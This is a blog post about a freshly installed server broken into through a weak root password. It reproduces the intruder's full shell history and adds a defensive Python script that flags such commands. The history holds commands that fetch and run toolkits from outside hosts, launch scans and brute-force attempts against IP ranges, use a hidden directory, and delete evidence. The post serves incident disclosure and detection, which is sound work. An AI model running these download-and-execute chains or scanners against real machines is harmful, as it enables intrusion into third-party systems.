Recently the user base of 千寻影视 has been growing quite fast and the servers were getting close to their limit, so we bought a new server. It went straight from the vendor to the data center to have a system installed, and since it was a fresh install I set the root password to something very simple: root1234. Miracles do happen: the very next day I could not log in anymore. In that short a time a hacker had already paid a visit.
This hacker does not seem to have done anything particularly nasty. I am posting the traces he left behind here; anyone who is interested is welcome to dig into them:
Contents of .bash_history (he did not even clear it; the first thing this fellow did after getting in was change the password):
passwd
cd /usr/games
ls -a
wget www.darkkid.webs.com/arhive/skdet.tgz ; tar zxvf skdet.tgz ; cd skdet ; chmod +x *
last -10
./bleah 187.109.205.69
./bleah 89.137.248.231
cd ..
wget whitehack.do.am/eyes.tgz ; tar zxvf eyes.tgz ;rm -rf eyes.tgz ; cd .eyes ; chmod +x * ; touch bios.txt
ls -a
last -10
./a 113.106 ; ./a 114.81 ; ./a 101.81
screen
./screen
ping 127.0.0.1
./screen -r
./screen -r
ping 127.0.0.1
w
screen -r
cd /usr/games
ls -a
cd .eyes
./screen -r
ping 127.0.0.1
w
ps x
ls -a
cd /usr/games
ls -a
cd .eyes
./screen -r
cd ..
cd scan
ls -a
cat vuln.txt
ssh -l root 222.93.115.156
nano vuln.txt
ls -a
rm -rf mfu.txt vuln.txt
ps x
cd ..
ls -a
cd .eyes
./screen -r
ping 127.0.0.1
./screen -r
ls -a
cd ..
ls -a
cd scan
ls -a
nano mfu.txt
cat vuln.txt
cd ..
cd .eyes
./screen -r
cd ..
ls -a
cd scan
nano mfu.txt
cd ..
cd .eyes
./screen -r
./screen -r
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ls -a
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ls -a
rm -rf bios.txt
cd ..
ls -a
cd scan
ls -a
rm -rf mfu.txt vuln.txt
./go.sh 139
ls -a
cat vuln.txt
exit
cd /usr/games
ls -a
cd scan
ls -a
cat vuln.txt
w
cd ..
ls -a
cd .eyes
./screen -r
w
ps x
kill -9 23629
./screen
ping 127.0.0.1
./screen -r
./screen -r 3707.pts-0.localhost
./screen -r 23782.pts-2.localhost
./screen -r
ps x
ping 127.0.0.1
w
ps x
cd /usr/games
ls -a
cd .eyes
./screen -r
cd ..
cd scan
ls -a
rm -rf mfu.txt vuln.txt
cd ..
cd .eyes
./screen -r
From the commands you can see that this fellow downloaded two files. I am attaching both files here as well, in case the originals disappear in the future.
skdet.tgz
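As an added example (not part of the original post), here is a small Python triage script that pulls the download URLs and the fetch/unpack/chmod chains out of a shell history like the one above, and flags the other patterns visible in it: a password change, moving into a dot-directory, tools invoked with IP prefixes, and outbound root SSH. The sample history is constructed to mirror that pattern; its hosts and addresses are placeholders, not the ones from the post.

```python
import re

# Constructed sample modelled on the history shown above; hosts and IPs are placeholders.
SAMPLE_HISTORY = """passwd
cd /usr/games
ls -a
wget tools.example.invalid/skdet.tgz ; tar zxvf skdet.tgz ; cd skdet ; chmod +x *
last -10
./bleah 203.0.113.7
cd ..
wget other.example.invalid/eyes.tgz ; tar zxvf eyes.tgz ;rm -rf eyes.tgz ; cd .eyes ; chmod +x * ; touch bios.txt
./a 198.51 ; ./a 203.0
./screen -r
cat vuln.txt
ssh -l root 192.0.2.9
rm -rf mfu.txt vuln.txt
"""

DOWNLOAD = re.compile(r"\b(?:wget|curl)\s+(\S+)")
EXTRACT = re.compile(r"\btar\s+\S*x")                     # tar with an extract flag
MAKE_EXEC = re.compile(r"\bchmod\s+\+x")
HIDDEN_DIR = re.compile(r"\bcd\s+\.[^./\s]")              # cd into a dot-directory such as .eyes
IP_ARG_TOOL = re.compile(r"^\./\S+\s+\d{1,3}(?:\.\d{1,3}){1,3}\s*$")  # ./tool 113.106 style
ROOT_SSH = re.compile(r"\bssh\s+-l\s+root\b|\bssh\s+root@")

def triage_history(text):
    """Return (download_urls, findings); each finding is (line_no, tag, command)."""
    urls, findings = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if line.strip() == "passwd":
            findings.append((n, "credential-change", line))
        urls.extend(DOWNLOAD.findall(line))
        # fetch, unpack and mark executable on one line: the drop-and-run chain seen above
        if DOWNLOAD.search(line) and EXTRACT.search(line) and MAKE_EXEC.search(line):
            findings.append((n, "download-extract-exec", line))
        if HIDDEN_DIR.search(line):
            findings.append((n, "hidden-dir", line))
        for cmd in (c.strip() for c in line.split(";")):
            if IP_ARG_TOOL.match(cmd):
                findings.append((n, "ip-arg-tool", cmd))
        if ROOT_SSH.search(line):
            findings.append((n, "outbound-root-ssh", line))
    return urls, findings

if __name__ == "__main__":
    urls, findings = triage_history(SAMPLE_HISTORY)
    print("downloaded:", urls)
    for n, tag, cmd in findings:
        print(f"{n:3d} {tag:22s} {cmd}")
```

On a real box, feed it the recovered .bash_history and check each reported URL against the proxy and DNS logs for the same window to establish when the files were pulled.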